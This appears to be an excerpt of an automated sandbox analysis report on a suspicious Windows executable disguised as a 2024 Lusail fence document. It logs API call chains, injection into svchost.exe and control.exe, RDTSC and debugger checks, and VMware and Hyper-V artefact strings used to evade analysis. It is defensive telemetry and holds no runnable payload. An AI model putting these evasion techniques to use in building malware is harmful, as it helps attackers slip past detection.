Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: 0_2_00D84A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_00D84A35
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: 0_2_00E055FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00E055FD

Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe

Code function: 0_2_00DA33C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00DA33C7

Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	API/Special instruction interceptor: Address: 18C3204
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7FFB2CECD324
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7FFB2CED0774
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7FFB2CED0154
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7FFB2CECD8A4
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7FFB2CECDA44
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7FFB2CECD1E4
Source: C:\Windows\SysWOW64\control.exe	API/Special instruction interceptor: Address: 7FFB2CECD324
Source: C:\Windows\SysWOW64\control.exe	API/Special instruction interceptor: Address: 7FFB2CED0774
Source: C:\Windows\SysWOW64\control.exe	API/Special instruction interceptor: Address: 7FFB2CECD944
Source: C:\Windows\SysWOW64\control.exe	API/Special instruction interceptor: Address: 7FFB2CECD504
Source: C:\Windows\SysWOW64\control.exe	API/Special instruction interceptor: Address: 7FFB2CECD544
Source: C:\Windows\SysWOW64\control.exe	API/Special instruction interceptor: Address: 7FFB2CECD1E4
Source: C:\Windows\SysWOW64\control.exe	API/Special instruction interceptor: Address: 7FFB2CED0154
Source: C:\Windows\SysWOW64\control.exe	API/Special instruction interceptor: Address: 7FFB2CECD8A4
Source: C:\Windows\SysWOW64\control.exe	API/Special instruction interceptor: Address: 7FFB2CECDA44

Tries to detect virtualization through RDTSC time measurements

Source: C:\Windows\SysWOW64\svchost.exe	RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe	RDTSC instruction interceptor: First address: 409B6E second address: 409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\control.exe	RDTSC instruction interceptor: First address: 1A9904 second address: 1A990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\control.exe	RDTSC instruction interceptor: First address: 1A9B6E second address: 1A9B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00409AA0 rdtsc

2_2_00409AA0

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 978	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 8956	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 883	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Window / User API: threadDelayed 9842	Jump to behavior

Source: C:\Windows\explorer.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-100134

Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	API coverage: 4.6 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 2.0 %
Source: C:\Windows\SysWOW64\control.exe	API coverage: 2.0 %

Source: C:\Windows\explorer.exe TID: 7952	Thread sleep count: 978 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7952	Thread sleep time: -1956000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7952	Thread sleep count: 8956 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7952	Thread sleep time: -17912000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe TID: 7800	Thread sleep count: 130 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe TID: 7800	Thread sleep time: -260000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe TID: 7800	Thread sleep count: 9842 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe TID: 7800	Thread sleep time: -19684000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\control.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\control.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: 0_2_00DE4696 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00DE4696
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: 0_2_00DEC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00DEC9C7
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: 0_2_00DEC93C FindFirstFileW,FindClose,	0_2_00DEC93C
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: 0_2_00DEF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00DEF200
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: 0_2_00DEF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00DEF35D
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: 0_2_00DEF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00DEF65E
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: 0_2_00DE3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00DE3A2B
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: 0_2_00DE3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00DE3D4E
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: 0_2_00DEBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00DEBF27

Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe

Code function: 0_2_00D84AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00D84AFE

Source: explorer.exe, 00000003.00000000.1372817528.0000000000C74000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000I
Source: explorer.exe, 00000003.00000000.1373914152.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.
Source: explorer.exe, 00000003.00000003.3074348658.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000003.00000000.1377287114.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272115538.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3816237958.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3074348658.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000003.00000000.1373914152.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.NoneVMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9dVMware20,1
Source: explorer.exe, 00000003.00000000.1373914152.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.VMW201.00V.20829224.B64.221121184211/21/2022
Source: explorer.exe, 00000003.00000000.1377287114.0000000009013000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000003.00000000.1373914152.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: explorer.exe, 00000003.00000003.2273284705.000000000730A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: War&Prod_VMware_xU1
Source: explorer.exe, 00000003.00000003.3074348658.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
Source: explorer.exe, 00000003.00000003.3074348658.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000I}~"
Source: explorer.exe, 00000003.00000002.3817490344.0000000009052000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000}io
Source: explorer.exe, 00000003.00000003.3074348658.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000003.00000003.2272115538.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3816237958.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1377287114.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3074348658.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWystem32\DriverStore\en-US\machine.inf_loc5
Source: explorer.exe, 00000003.00000000.1373914152.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware20,1
Source: explorer.exe, 00000003.00000000.1373914152.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
Source: explorer.exe, 00000003.00000003.3074348658.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMWare
Source: explorer.exe, 00000003.00000002.3817490344.0000000009052000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000'
Source: explorer.exe, 00000003.00000003.2273284705.000000000730A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: War&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: explorer.exe, 00000003.00000002.3816237958.0000000008F27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1377287114.0000000008F27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3074348658.0000000008F27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272115538.0000000008F27000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWT`
Source: explorer.exe, 00000003.00000000.1373914152.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SVGA IIES1371
Source: explorer.exe, 00000003.00000000.1373914152.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware Virtual RAM
Source: explorer.exe, 00000003.00000000.1373914152.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: explorer.exe, 00000003.00000000.1372817528.0000000000C74000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000003.00000003.3074348658.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.1372817528.0000000000C74000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	API call chain: ExitProcess graph end node			graph_0-98733
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	API call chain: ExitProcess graph end node			graph_0-98913

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00409AA0 rdtsc

2_2_00409AA0

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0040ACE0 LdrLoadDll,

2_2_0040ACE0

Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe

Code function: 0_2_00DF41FD BlockInput,

0_2_00DF41FD

Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe

Code function: 0_2_00D83B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00D83B4C

Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe

Code function: 0_2_00DB5CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00DB5CCC

Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe

Code function: 0_2_00DFC304 LoadLibraryA,GetProcAddress,

0_2_00DFC304

Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: 0_2_018C34D0 mov eax, dword ptr fs:[00000030h]	0_2_018C34D0
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: 0_2_018C3470 mov eax, dword ptr fs:[00000030h]	0_2_018C3470
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: 0_2_018C1E70 mov eax, dword ptr fs:[00000030h]	0_2_018C1E70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036D437C mov eax, dword ptr fs:[00000030h]	2_2_036D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]	2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]	2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]	2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]	2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]	2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]	2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]	2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]	2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]	2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]	2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]	2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]	2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]	2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]	2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]	2_2_036B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]	2_2_036B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]	2_2_036B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]	2_2_036B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B035C mov ecx, dword ptr fs:[00000030h]	2_2_036B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]	2_2_036B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]	2_2_036B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036FA352 mov eax, dword ptr fs:[00000030h]	2_2_036FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036D8350 mov ecx, dword ptr fs:[00000030h]	2_2_036D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0370634F mov eax, dword ptr fs:[00000030h]	2_2_0370634F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03708324 mov eax, dword ptr fs:[00000030h]	2_2_03708324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03708324 mov ecx, dword ptr fs:[00000030h]	2_2_03708324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03708324 mov eax, dword ptr fs:[00000030h]	2_2_03708324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03708324 mov eax, dword ptr fs:[00000030h]	2_2_03708324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366A30B mov eax, dword ptr fs:[00000030h]	2_2_0366A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366A30B mov eax, dword ptr fs:[00000030h]	2_2_0366A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366A30B mov eax, dword ptr fs:[00000030h]	2_2_0366A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362C310 mov ecx, dword ptr fs:[00000030h]	2_2_0362C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03650310 mov ecx, dword ptr fs:[00000030h]	2_2_03650310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]	2_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]	2_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]	2_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]	2_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]	2_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]	2_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]	2_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]	2_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0364E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0364E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0364E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0364E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0364E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0364E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036663FF mov eax, dword ptr fs:[00000030h]	2_2_036663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036EC3CD mov eax, dword ptr fs:[00000030h]	2_2_036EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0363A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0363A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0363A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0363A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0363A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0363A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h]	2_2_036383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h]	2_2_036383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h]	2_2_036383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h]	2_2_036383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B63C0 mov eax, dword ptr fs:[00000030h]	2_2_036B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036DE3DB mov eax, dword ptr fs:[00000030h]	2_2_036DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036DE3DB mov eax, dword ptr fs:[00000030h]	2_2_036DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036DE3DB mov ecx, dword ptr fs:[00000030h]	2_2_036DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036DE3DB mov eax, dword ptr fs:[00000030h]	2_2_036DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036D43D4 mov eax, dword ptr fs:[00000030h]	2_2_036D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036D43D4 mov eax, dword ptr fs:[00000030h]	2_2_036D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362E388 mov eax, dword ptr fs:[00000030h]	2_2_0362E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362E388 mov eax, dword ptr fs:[00000030h]	2_2_0362E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362E388 mov eax, dword ptr fs:[00000030h]	2_2_0362E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365438F mov eax, dword ptr fs:[00000030h]	2_2_0365438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365438F mov eax, dword ptr fs:[00000030h]	2_2_0365438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03628397 mov eax, dword ptr fs:[00000030h]	2_2_03628397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03628397 mov eax, dword ptr fs:[00000030h]	2_2_03628397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03628397 mov eax, dword ptr fs:[00000030h]	2_2_03628397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03634260 mov eax, dword ptr fs:[00000030h]	2_2_03634260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03634260 mov eax, dword ptr fs:[00000030h]	2_2_03634260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03634260 mov eax, dword ptr fs:[00000030h]	2_2_03634260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362826B mov eax, dword ptr fs:[00000030h]	2_2_0362826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]	2_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]	2_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]	2_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]	2_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]	2_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]	2_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]	2_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]	2_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]	2_2_036E0274
